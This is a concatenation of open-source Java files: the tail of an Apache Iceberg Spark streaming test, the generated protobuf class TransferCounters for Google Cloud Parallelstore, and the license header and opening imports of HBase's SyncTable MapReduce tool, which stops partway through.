TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); DataFile dataFile = DataFiles.builder(table.spec()) .withPath(File.createTempFile("junit", null, temp.toFile()).getPath()) .withFileSizeInBytes(10) .withRecordCount(1) .withFormat(FileFormat.PARQUET) .build(); // this should create a snapshot with type overwrite. table .newOverwrite() .addFile(dataFile) .overwriteByRowFilter(Expressions.greaterThan("id", 4)) .commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // OVERWRITE. assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE); StreamingQuery query = startStream(SparkReadOptions.STREAMING_SKIP_OVERWRITE_SNAPSHOTS, "true"); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots)); } /** * We are testing that all the files in a rewrite snapshot are skipped Create a rewrite data files * snapshot using existing files. */ public void makeRewriteDataFiles() { table.refresh(); // we are testing that all the files in a rewrite snapshot are skipped // create a rewrite data files snapshot using existing files RewriteFiles rewrite = table.newRewrite(); Iterable<Snapshot> it = table.snapshots(); for (Snapshot snapshot : it) { if (snapshot.operation().equals(DataOperations.APPEND)) { Iterable<DataFile> datafiles = snapshot.addedDataFiles(table.io()); for (DataFile datafile : datafiles) { rewrite.addFile(datafile); rewrite.deleteFile(datafile); } } } rewrite.commit(); } /** * appends each list as a Snapshot on the iceberg table at the given location. accepts a list of * lists - each list representing data per snapshot. */ private void appendDataAsMultipleSnapshots(List<List<SimpleRecord>> data) { for (List<SimpleRecord> l : data) { appendData(l); } } private void appendData(List<SimpleRecord> data) { appendData(data, "parquet"); } private void appendData(List<SimpleRecord> data, String format) { Dataset<Row> df = spark.createDataFrame(data, SimpleRecord.class); df.select("id", "data") .write() .format("iceberg") .option("write-format", format) .mode("append") .save(tableName); } private static final String MEMORY_TABLE = "_stream_view_mem"; private StreamingQuery startStream(Map<String, String> options) throws TimeoutException { return spark .readStream() .options(options) .format("iceberg") .load(tableName) .writeStream() .options(options) .format("memory") .queryName(MEMORY_TABLE) .outputMode(OutputMode.Append()) .start(); } private StreamingQuery startStream() throws TimeoutException { return startStream(Collections.emptyMap()); } private StreamingQuery startStream(String key, String value) throws TimeoutException { return startStream( ImmutableMap.of(key, value, SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1")); } private void assertMicroBatchRecordSizes( Map<String, String> options, List<Long> expectedMicroBatchRecordSize) throws TimeoutException { assertMicroBatchRecordSizes(options, expectedMicroBatchRecordSize, Trigger.ProcessingTime(0L)); } private void assertMicroBatchRecordSizes( Map<String, String> options, List<Long> expectedMicroBatchRecordSize, Trigger trigger) throws TimeoutException { Dataset<Row> ds = spark.readStream().options(options).format("iceberg").load(tableName); List<Long> syncList = Collections.synchronizedList(Lists.newArrayList()); ds.writeStream() .options(options) .trigger(trigger) .foreachBatch( (VoidFunction2<Dataset<Row>, Long>) (dataset, batchId) -> { microBatches.getAndIncrement(); syncList.add(dataset.count()); }) .start() .processAllAvailable(); stopStreams(); assertThat(syncList).containsExactlyInAnyOrderElementsOf(expectedMicroBatchRecordSize); } private List<SimpleRecord> rowsAvailable(StreamingQuery query) { query.processAllAvailable(); return spark .sql("select * from " + MEMORY_TABLE) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); } }
googleapis/google-cloud-java
35,674
java-parallelstore/proto-google-cloud-parallelstore-v1/src/main/java/com/google/cloud/parallelstore/v1/TransferCounters.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/parallelstore/v1/parallelstore.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.parallelstore.v1; /** * * * <pre> * A collection of counters that report the progress of a transfer operation. * </pre> * * Protobuf type {@code google.cloud.parallelstore.v1.TransferCounters} */ public final class TransferCounters extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.parallelstore.v1.TransferCounters) TransferCountersOrBuilder { private static final long serialVersionUID = 0L; // Use TransferCounters.newBuilder() to construct. private TransferCounters(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private TransferCounters() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new TransferCounters(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.parallelstore.v1.TransferCounters.class, com.google.cloud.parallelstore.v1.TransferCounters.Builder.class); } public static final int OBJECTS_FOUND_FIELD_NUMBER = 1; private long objectsFound_ = 0L; /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @return The objectsFound. */ @java.lang.Override public long getObjectsFound() { return objectsFound_; } public static final int BYTES_FOUND_FIELD_NUMBER = 2; private long bytesFound_ = 0L; /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 bytes_found = 2;</code> * * @return The bytesFound. */ @java.lang.Override public long getBytesFound() { return bytesFound_; } public static final int OBJECTS_SKIPPED_FIELD_NUMBER = 3; private long objectsSkipped_ = 0L; /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 objects_skipped = 3;</code> * * @return The objectsSkipped. */ @java.lang.Override public long getObjectsSkipped() { return objectsSkipped_; } public static final int BYTES_SKIPPED_FIELD_NUMBER = 4; private long bytesSkipped_ = 0L; /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @return The bytesSkipped. */ @java.lang.Override public long getBytesSkipped() { return bytesSkipped_; } public static final int OBJECTS_COPIED_FIELD_NUMBER = 5; private long objectsCopied_ = 0L; /** * * * <pre> * Objects that are copied to the data destination. * </pre> * * <code>int64 objects_copied = 5;</code> * * @return The objectsCopied. */ @java.lang.Override public long getObjectsCopied() { return objectsCopied_; } public static final int BYTES_COPIED_FIELD_NUMBER = 6; private long bytesCopied_ = 0L; /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @return The bytesCopied. */ @java.lang.Override public long getBytesCopied() { return bytesCopied_; } public static final int OBJECTS_FAILED_FIELD_NUMBER = 7; private long objectsFailed_ = 0L; /** * * * <pre> * Objects that are failed to write to the data destination. * </pre> * * <code>int64 objects_failed = 7;</code> * * @return The objectsFailed. */ @java.lang.Override public long getObjectsFailed() { return objectsFailed_; } public static final int BYTES_FAILED_FIELD_NUMBER = 8; private long bytesFailed_ = 0L; /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @return The bytesFailed. */ @java.lang.Override public long getBytesFailed() { return bytesFailed_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (objectsFound_ != 0L) { output.writeInt64(1, objectsFound_); } if (bytesFound_ != 0L) { output.writeInt64(2, bytesFound_); } if (objectsSkipped_ != 0L) { output.writeInt64(3, objectsSkipped_); } if (bytesSkipped_ != 0L) { output.writeInt64(4, bytesSkipped_); } if (objectsCopied_ != 0L) { output.writeInt64(5, objectsCopied_); } if (bytesCopied_ != 0L) { output.writeInt64(6, bytesCopied_); } if (objectsFailed_ != 0L) { output.writeInt64(7, objectsFailed_); } if (bytesFailed_ != 0L) { output.writeInt64(8, bytesFailed_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (objectsFound_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(1, objectsFound_); } if (bytesFound_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(2, bytesFound_); } if (objectsSkipped_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(3, objectsSkipped_); } if (bytesSkipped_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(4, bytesSkipped_); } if (objectsCopied_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(5, objectsCopied_); } if (bytesCopied_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(6, bytesCopied_); } if (objectsFailed_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(7, objectsFailed_); } if (bytesFailed_ != 0L) { size += com.google.protobuf.CodedOutputStream.computeInt64Size(8, bytesFailed_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.parallelstore.v1.TransferCounters)) { return super.equals(obj); } com.google.cloud.parallelstore.v1.TransferCounters other = (com.google.cloud.parallelstore.v1.TransferCounters) obj; if (getObjectsFound() != other.getObjectsFound()) return false; if (getBytesFound() != other.getBytesFound()) return false; if (getObjectsSkipped() != other.getObjectsSkipped()) return false; if (getBytesSkipped() != other.getBytesSkipped()) return false; if (getObjectsCopied() != other.getObjectsCopied()) return false; if (getBytesCopied() != other.getBytesCopied()) return false; if (getObjectsFailed() != other.getObjectsFailed()) return false; if (getBytesFailed() != other.getBytesFailed()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + OBJECTS_FOUND_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsFound()); hash = (37 * hash) + BYTES_FOUND_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getBytesFound()); hash = (37 * hash) + OBJECTS_SKIPPED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsSkipped()); hash = (37 * hash) + BYTES_SKIPPED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getBytesSkipped()); hash = (37 * hash) + OBJECTS_COPIED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsCopied()); hash = (37 * hash) + BYTES_COPIED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getBytesCopied()); hash = (37 * hash) + OBJECTS_FAILED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getObjectsFailed()); hash = (37 * hash) + BYTES_FAILED_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getBytesFailed()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.parallelstore.v1.TransferCounters parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.parallelstore.v1.TransferCounters parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.parallelstore.v1.TransferCounters prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * A collection of counters that report the progress of a transfer operation. * </pre> * * Protobuf type {@code google.cloud.parallelstore.v1.TransferCounters} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.parallelstore.v1.TransferCounters) com.google.cloud.parallelstore.v1.TransferCountersOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.parallelstore.v1.TransferCounters.class, com.google.cloud.parallelstore.v1.TransferCounters.Builder.class); } // Construct using com.google.cloud.parallelstore.v1.TransferCounters.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; objectsFound_ = 0L; bytesFound_ = 0L; objectsSkipped_ = 0L; bytesSkipped_ = 0L; objectsCopied_ = 0L; bytesCopied_ = 0L; objectsFailed_ = 0L; bytesFailed_ = 0L; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_descriptor; } @java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters getDefaultInstanceForType() { return com.google.cloud.parallelstore.v1.TransferCounters.getDefaultInstance(); } @java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters build() { com.google.cloud.parallelstore.v1.TransferCounters result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters buildPartial() { com.google.cloud.parallelstore.v1.TransferCounters result = new com.google.cloud.parallelstore.v1.TransferCounters(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.parallelstore.v1.TransferCounters result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.objectsFound_ = objectsFound_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.bytesFound_ = bytesFound_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.objectsSkipped_ = objectsSkipped_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.bytesSkipped_ = bytesSkipped_; } if (((from_bitField0_ & 0x00000010) != 0)) { result.objectsCopied_ = objectsCopied_; } if (((from_bitField0_ & 0x00000020) != 0)) { result.bytesCopied_ = bytesCopied_; } if (((from_bitField0_ & 0x00000040) != 0)) { result.objectsFailed_ = objectsFailed_; } if (((from_bitField0_ & 0x00000080) != 0)) { result.bytesFailed_ = bytesFailed_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.parallelstore.v1.TransferCounters) { return mergeFrom((com.google.cloud.parallelstore.v1.TransferCounters) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.parallelstore.v1.TransferCounters other) { if (other == com.google.cloud.parallelstore.v1.TransferCounters.getDefaultInstance()) return this; if (other.getObjectsFound() != 0L) { setObjectsFound(other.getObjectsFound()); } if (other.getBytesFound() != 0L) { setBytesFound(other.getBytesFound()); } if (other.getObjectsSkipped() != 0L) { setObjectsSkipped(other.getObjectsSkipped()); } if (other.getBytesSkipped() != 0L) { setBytesSkipped(other.getBytesSkipped()); } if (other.getObjectsCopied() != 0L) { setObjectsCopied(other.getObjectsCopied()); } if (other.getBytesCopied() != 0L) { setBytesCopied(other.getBytesCopied()); } if (other.getObjectsFailed() != 0L) { setObjectsFailed(other.getObjectsFailed()); } if (other.getBytesFailed() != 0L) { setBytesFailed(other.getBytesFailed()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 8: { objectsFound_ = input.readInt64(); bitField0_ |= 0x00000001; break; } // case 8 case 16: { bytesFound_ = input.readInt64(); bitField0_ |= 0x00000002; break; } // case 16 case 24: { objectsSkipped_ = input.readInt64(); bitField0_ |= 0x00000004; break; } // case 24 case 32: { bytesSkipped_ = input.readInt64(); bitField0_ |= 0x00000008; break; } // case 32 case 40: { objectsCopied_ = input.readInt64(); bitField0_ |= 0x00000010; break; } // case 40 case 48: { bytesCopied_ = input.readInt64(); bitField0_ |= 0x00000020; break; } // case 48 case 56: { objectsFailed_ = input.readInt64(); bitField0_ |= 0x00000040; break; } // case 56 case 64: { bytesFailed_ = input.readInt64(); bitField0_ |= 0x00000080; break; } // case 64 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private long objectsFound_; /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @return The objectsFound. */ @java.lang.Override public long getObjectsFound() { return objectsFound_; } /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @param value The objectsFound to set. * @return This builder for chaining. */ public Builder setObjectsFound(long value) { objectsFound_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @return This builder for chaining. */ public Builder clearObjectsFound() { bitField0_ = (bitField0_ & ~0x00000001); objectsFound_ = 0L; onChanged(); return this; } private long bytesFound_; /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 bytes_found = 2;</code> * * @return The bytesFound. */ @java.lang.Override public long getBytesFound() { return bytesFound_; } /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 bytes_found = 2;</code> * * @param value The bytesFound to set. * @return This builder for chaining. */ public Builder setBytesFound(long value) { bytesFound_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 bytes_found = 2;</code> * * @return This builder for chaining. */ public Builder clearBytesFound() { bitField0_ = (bitField0_ & ~0x00000002); bytesFound_ = 0L; onChanged(); return this; } private long objectsSkipped_; /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 objects_skipped = 3;</code> * * @return The objectsSkipped. */ @java.lang.Override public long getObjectsSkipped() { return objectsSkipped_; } /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 objects_skipped = 3;</code> * * @param value The objectsSkipped to set. * @return This builder for chaining. */ public Builder setObjectsSkipped(long value) { objectsSkipped_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Objects in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 objects_skipped = 3;</code> * * @return This builder for chaining. */ public Builder clearObjectsSkipped() { bitField0_ = (bitField0_ & ~0x00000004); objectsSkipped_ = 0L; onChanged(); return this; } private long bytesSkipped_; /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @return The bytesSkipped. */ @java.lang.Override public long getBytesSkipped() { return bytesSkipped_; } /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @param value The bytesSkipped to set. * @return This builder for chaining. */ public Builder setBytesSkipped(long value) { bytesSkipped_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Bytes in the data source that are not transferred because they already * exist in the data destination. * </pre> * * <code>int64 bytes_skipped = 4;</code> * * @return This builder for chaining. */ public Builder clearBytesSkipped() { bitField0_ = (bitField0_ & ~0x00000008); bytesSkipped_ = 0L; onChanged(); return this; } private long objectsCopied_; /** * * * <pre> * Objects that are copied to the data destination. * </pre> * * <code>int64 objects_copied = 5;</code> * * @return The objectsCopied. */ @java.lang.Override public long getObjectsCopied() { return objectsCopied_; } /** * * * <pre> * Objects that are copied to the data destination. * </pre> * * <code>int64 objects_copied = 5;</code> * * @param value The objectsCopied to set. * @return This builder for chaining. */ public Builder setObjectsCopied(long value) { objectsCopied_ = value; bitField0_ |= 0x00000010; onChanged(); return this; } /** * * * <pre> * Objects that are copied to the data destination. * </pre> * * <code>int64 objects_copied = 5;</code> * * @return This builder for chaining. */ public Builder clearObjectsCopied() { bitField0_ = (bitField0_ & ~0x00000010); objectsCopied_ = 0L; onChanged(); return this; } private long bytesCopied_; /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @return The bytesCopied. */ @java.lang.Override public long getBytesCopied() { return bytesCopied_; } /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @param value The bytesCopied to set. * @return This builder for chaining. */ public Builder setBytesCopied(long value) { bytesCopied_ = value; bitField0_ |= 0x00000020; onChanged(); return this; } /** * * * <pre> * Bytes that are copied to the data destination. * </pre> * * <code>int64 bytes_copied = 6;</code> * * @return This builder for chaining. */ public Builder clearBytesCopied() { bitField0_ = (bitField0_ & ~0x00000020); bytesCopied_ = 0L; onChanged(); return this; } private long objectsFailed_; /** * * * <pre> * Objects that are failed to write to the data destination. * </pre> * * <code>int64 objects_failed = 7;</code> * * @return The objectsFailed. */ @java.lang.Override public long getObjectsFailed() { return objectsFailed_; } /** * * * <pre> * Objects that are failed to write to the data destination. * </pre> * * <code>int64 objects_failed = 7;</code> * * @param value The objectsFailed to set. * @return This builder for chaining. */ public Builder setObjectsFailed(long value) { objectsFailed_ = value; bitField0_ |= 0x00000040; onChanged(); return this; } /** * * * <pre> * Objects that are failed to write to the data destination. * </pre> * * <code>int64 objects_failed = 7;</code> * * @return This builder for chaining. */ public Builder clearObjectsFailed() { bitField0_ = (bitField0_ & ~0x00000040); objectsFailed_ = 0L; onChanged(); return this; } private long bytesFailed_; /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @return The bytesFailed. */ @java.lang.Override public long getBytesFailed() { return bytesFailed_; } /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @param value The bytesFailed to set. * @return This builder for chaining. */ public Builder setBytesFailed(long value) { bytesFailed_ = value; bitField0_ |= 0x00000080; onChanged(); return this; } /** * * * <pre> * Bytes that are failed to write to the data destination. * </pre> * * <code>int64 bytes_failed = 8;</code> * * @return This builder for chaining. */ public Builder clearBytesFailed() { bitField0_ = (bitField0_ & ~0x00000080); bytesFailed_ = 0L; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.parallelstore.v1.TransferCounters) } // @@protoc_insertion_point(class_scope:google.cloud.parallelstore.v1.TransferCounters) private static final com.google.cloud.parallelstore.v1.TransferCounters DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.parallelstore.v1.TransferCounters(); } public static com.google.cloud.parallelstore.v1.TransferCounters getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<TransferCounters> PARSER = new com.google.protobuf.AbstractParser<TransferCounters>() { @java.lang.Override public TransferCounters parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<TransferCounters> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<TransferCounters> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.parallelstore.v1.TransferCounters getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/hbase
35,847
hbase-mapreduce/src/main/java/org/apache/hadoop/hbase/mapreduce/SyncTable.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hbase.mapreduce; import java.io.IOException; import java.net.URI; import java.net.URISyntaxException; import java.util.Collections; import java.util.Iterator; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.conf.Configured; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.hbase.Cell; import org.apache.hadoop.hbase.CellBuilderFactory; import 